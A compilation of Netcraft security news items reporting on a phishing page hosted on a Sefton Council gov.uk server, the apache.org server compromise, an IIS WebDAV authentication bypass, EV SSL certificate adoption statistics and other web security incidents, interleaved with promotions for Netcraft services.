An ongoing phishing attack against UK taxpayers is being given additional credibility by using a gov.uk domain. Sefton Council is hosting the phishing content on its Novel GroupWise 7.0 site at web11.sefton.gov.uk.

The phish follows one of the typical ploys commonly seen in HMRC and IRS phishing attacks: The victim is led to believe that they can receive a tax refund by submitting their full credit card details, but these details are instead sent directly to the fraudster behind the attack.

The fraudulent form submits the victim's details to a PHP script hosted at www.zamoh.biz.

The UK's Central Office of Information is responsible for deciding who can register gov.uk domains. Eligibility is strictly limited, which helps to preserve the integrity of the gov.uk namespace; however, this obviously has an undesirable effect when this integrity is leveraged by fraudulent content on compromised servers. Netcraft has informed Sefton Council about this phishing attack.

Netcraft provides an Automated Vulnerability Scanning service which regularly tests your internet infrastructure, supplies the information you need to maintain your security and eliminate vulnerabilities, and audits that it has found no serious vulnerabilities using a dynamically generated seal.

Apache.org has been offline for 3 hours this morning, after one of their servers was compromised. Their sites were displaying the message:

The message goes on to say that the compromise is "not due to any software exploits in Apache itself", but was instead due to a compromised SSH key.

Update: Most of apache.org's sites have been back online this afternoon after they switched over to servers not compromised in the attack. Apache have released more information about the incident: an account used for backups was compromised on a back-end server. This server distributes content to Apache's public web servers, so the attackers used it to distribute scripts to the web servers; once the scripts were public, the attackers could execute them remotely, gaining access to the web servers as well. But these rogue processes were detected, so the servers were taken offline for investigation and clean-up.

The most recent Netcraft Web Server Survey found more than 62 million websites running Microsoft IIS 6.0, but many of these are unlikely to be affected by the latest WebDAV remote authentication bypass vulnerability.

A new WebDAV vulnerability was published by Nikolaos Rangos on Friday, and details how attackers can bypass access restrictions using a flaw in the WebDAV functionality on IIS 6.0. By failing to handle Unicode tokens properly, the bug gives attackers access to password protected folders and, in some cases, the ability to upload files to the affected web servers.

Although IIS 6.0 accounts for more than 90% of the Microsoft sites on the Internet, the total number of vulnerable sites is likely to be substantially less than 62 million because WebDAV is not a default component of IIS 6.0 when a Windows Server 2003 machine is given the role of Application Server. Nonetheless, some people may install and enable WebDAV to provide a convenient means of publishing and managing web server content through firewalls – because WebDAV is an extension to the HTTP protocol, it can operate over the same port number as HTTP.

Microsoft issued a security advisory on Monday, which also lists IIS 5.0 as vulnerable. This issue may affect a much larger proportion of the 2.8 million IIS 5.0 websites as, unlike its successor, Windows 2000 Server automatically installs WebDAV alongside IIS 5.0.

Two years after their first appearance in the Netcraft SSL Survey, there are now more than 11 thousand Extended Validation (EV) SSL certificates in use on the Web. Despite enjoying two years of continued growth, EV SSL certificates still only make up around 1% of all SSL certificates in use on the Internet.

Nearly all modern browsers now support EV SSL certificates by colouring all or part of the address bar in green.

The proportion of EV SSL certificates rises considerably amongst the world's busiest websites, as shown by Netcraft's top 1 million sites dataset. In general, it seems, the more traffic an SSL site has, the more likely it is to use an EV certificate, and in particular, more than a quarter of the SSL certificates within the top 1,000 sites have extended validation.

Population	SSL Certificates	EV SSL Certificates	EV SSL Share
All Sites	1,028,868	11,300	1.1%
Top 1,000,000	45,851	2,662	5.8%
Top 100,000	7,012	710	10.1%
Top 10,000	712	115	16.2%
Top 1,000	60	17	28.3%

A new wave of phishing attacks against eBay is exploiting a clever combination of wildcard DNS records and cross-site scripting (XSS) vulnerabilities to use other people's websites to help steal credentials from victims.

Related Netcraft Service: Web Application Security Testing

Related Netcraft Service: SSL Survey

Netcraft's SSL Survey shows that 14% of valid third party SSL certificates are using MD5 signatures — an algorithm that is demonstrably vulnerable to attack.

Related Netcraft Service: SSL Survey

Netcraft has detected another live vulnerability on a Yahoo website, which is currently being used to steal authentication cookies from its users — transmitting them to a website under the control of a remote attacker. The attacker can then use the stolen details to gain access to his victims' Yahoo accounts, such as Yahoo Mail.

Related Netcraft Service: Web Application Security Testing

Netcraft's Phishing Site Takedown and Countermeasures service helps banks respond to phishing attacks promptly and effectively.

Netcraft's June SSL Survey has found that a significant number of SSL certificates are affected by the Debian OpenSSL vulnerability, including Extended Validation SSL certificates and certificates belonging to banks.

Related Netcraft Service: SSL Survey